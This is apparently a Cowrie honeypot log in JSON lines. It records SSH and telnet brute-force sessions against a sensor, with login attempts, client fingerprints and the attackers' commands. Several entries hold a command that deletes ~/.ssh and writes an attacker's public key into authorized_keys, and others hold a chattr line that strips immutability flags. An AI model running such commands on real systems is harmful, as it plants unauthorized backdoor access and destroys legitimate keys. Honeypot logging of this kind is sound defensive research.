{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:15:15.598995Z","src_ip":"212.227.235.229","session":"4ff7d32fbe4f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:15:15.647109Z","src_ip":"212.227.235.229","session":"f5533a10db60"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:15:15.808330Z","src_ip":"212.227.235.229","session":"4ff7d32fbe4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:15.809186Z","src_ip":"212.227.235.229","session":"4ff7d32fbe4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51518,"dst_ip":"1.2.3.4","dst_port":22,"session":"14b487763832","protocol":"ssh","message":"New connection: 212.227.235.229:51518 (1.2.3.4:22) [session: 14b487763832]","sensor":"my-vps","timestamp":"2025-09-08T22:15:16.009757Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:16.011044Z","src_ip":"212.227.235.229","session":"14b487763832"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:16.212059Z","src_ip":"212.227.235.229","session":"14b487763832"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:16.822952Z","src_ip":"212.227.235.229","session":"f5533a10db60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47186,"dst_ip":"1.2.3.4","dst_port":22,"session":"639ed5890110","protocol":"ssh","message":"New connection: 212.227.235.229:47186 (1.2.3.4:22) [session: 639ed5890110]","sensor":"my-vps","timestamp":"2025-09-08T22:15:17.003876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:17.004678Z","src_ip":"212.227.235.229","session":"639ed5890110"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:15:17.020270Z","src_ip":"212.227.235.229","session":"14b487763832"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:17.180341Z","src_ip":"212.227.235.229","session":"639ed5890110"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:15:17.923369Z","src_ip":"212.227.235.229","session":"639ed5890110"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:18.101809Z","src_ip":"212.227.235.229","session":"639ed5890110"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:18.107110Z","src_ip":"212.227.235.229","session":"565acd554ab6"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:18.227166Z","src_ip":"212.227.235.229","session":"14b487763832"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33410,"dst_ip":"1.2.3.4","dst_port":22,"session":"695cb13c2b2e","protocol":"ssh","message":"New connection: 212.227.235.229:33410 (1.2.3.4:22) [session: 695cb13c2b2e]","sensor":"my-vps","timestamp":"2025-09-08T22:15:18.430385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:18.431533Z","src_ip":"212.227.235.229","session":"695cb13c2b2e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:18.635205Z","src_ip":"212.227.235.229","session":"695cb13c2b2e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:15:19.489971Z","src_ip":"212.227.235.229","session":"695cb13c2b2e"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:19.696208Z","src_ip":"212.227.235.229","session":"4ff7d32fbe4f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:19.697258Z","src_ip":"212.227.235.229","session":"695cb13c2b2e"}
{"eventid":"cowrie.session.connect","src_ip":"45.78.193.100","src_port":34010,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bfd57d45973","protocol":"ssh","message":"New connection: 45.78.193.100:34010 (1.2.3.4:22) [session: 7bfd57d45973]","sensor":"my-vps","timestamp":"2025-09-08T22:15:20.123268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T22:15:20.124233Z","src_ip":"45.78.193.100","session":"7bfd57d45973"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53888,"dst_ip":"1.2.3.4","dst_port":22,"session":"914930b4d909","protocol":"ssh","message":"New connection: 212.227.235.229:53888 (1.2.3.4:22) [session: 914930b4d909]","sensor":"my-vps","timestamp":"2025-09-08T22:15:30.941451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:30.942298Z","src_ip":"212.227.235.229","session":"914930b4d909"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:31.252273Z","src_ip":"212.227.235.229","session":"914930b4d909"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin123!!","message":"login attempt [root/Admin123!!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:15:32.527834Z","src_ip":"212.227.235.229","session":"914930b4d909"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:15:33.209077Z","src_ip":"212.227.235.229","session":"914930b4d909"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:15:33.209798Z","src_ip":"212.227.235.229","session":"914930b4d909"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:15:33.211008Z","src_ip":"212.227.235.229","session":"914930b4d909"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:33.520874Z","src_ip":"212.227.235.229","session":"914930b4d909"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:15:34.189219Z","src_ip":"212.227.235.229","session":"914930b4d909"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:15:34.189929Z","src_ip":"212.227.235.229","session":"914930b4d909"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:15:34.500277Z","src_ip":"212.227.235.229","session":"914930b4d909"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:34.501196Z","src_ip":"212.227.235.229","session":"914930b4d909"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53900,"dst_ip":"1.2.3.4","dst_port":22,"session":"da1080e4c2f1","protocol":"ssh","message":"New connection: 212.227.235.229:53900 (1.2.3.4:22) [session: da1080e4c2f1]","sensor":"my-vps","timestamp":"2025-09-08T22:15:34.808441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:34.809272Z","src_ip":"212.227.235.229","session":"da1080e4c2f1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:35.117218Z","src_ip":"212.227.235.229","session":"da1080e4c2f1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:15:36.390341Z","src_ip":"212.227.235.229","session":"da1080e4c2f1"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:37.700991Z","src_ip":"212.227.235.229","session":"da1080e4c2f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53910,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8bf9998047b","protocol":"ssh","message":"New connection: 212.227.235.229:53910 (1.2.3.4:22) [session: a8bf9998047b]","sensor":"my-vps","timestamp":"2025-09-08T22:15:38.005327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:38.006762Z","src_ip":"212.227.235.229","session":"a8bf9998047b"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":36713,"dst_ip":"1.2.3.4","dst_port":23,"session":"8505f039785a","protocol":"telnet","message":"New connection: 202.107.95.221:36713 (1.2.3.4:23) [session: 8505f039785a]","sensor":"my-vps","timestamp":"2025-09-08T22:15:38.031769Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:38.310785Z","src_ip":"212.227.235.229","session":"a8bf9998047b"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":36727,"dst_ip":"1.2.3.4","dst_port":23,"session":"5784218768d6","protocol":"telnet","message":"New connection: 202.107.95.221:36727 (1.2.3.4:23) [session: 5784218768d6]","sensor":"my-vps","timestamp":"2025-09-08T22:15:39.237602Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:15:39.564957Z","src_ip":"212.227.235.229","session":"a8bf9998047b"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:39.868234Z","src_ip":"212.227.235.229","session":"914930b4d909"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:39.869390Z","src_ip":"212.227.235.229","session":"a8bf9998047b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52256,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c8408ca2bf2","protocol":"ssh","message":"New connection: 212.227.235.229:52256 (1.2.3.4:22) [session: 2c8408ca2bf2]","sensor":"my-vps","timestamp":"2025-09-08T22:15:47.541623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:47.542628Z","src_ip":"212.227.235.229","session":"2c8408ca2bf2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:47.832082Z","src_ip":"212.227.235.229","session":"2c8408ca2bf2"}
{"eventid":"cowrie.login.success","username":"root","password":"134679","message":"login attempt [root/134679] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:15:49.033820Z","src_ip":"212.227.235.229","session":"2c8408ca2bf2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:15:49.634089Z","src_ip":"212.227.235.229","session":"2c8408ca2bf2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:15:49.634774Z","src_ip":"212.227.235.229","session":"2c8408ca2bf2"}
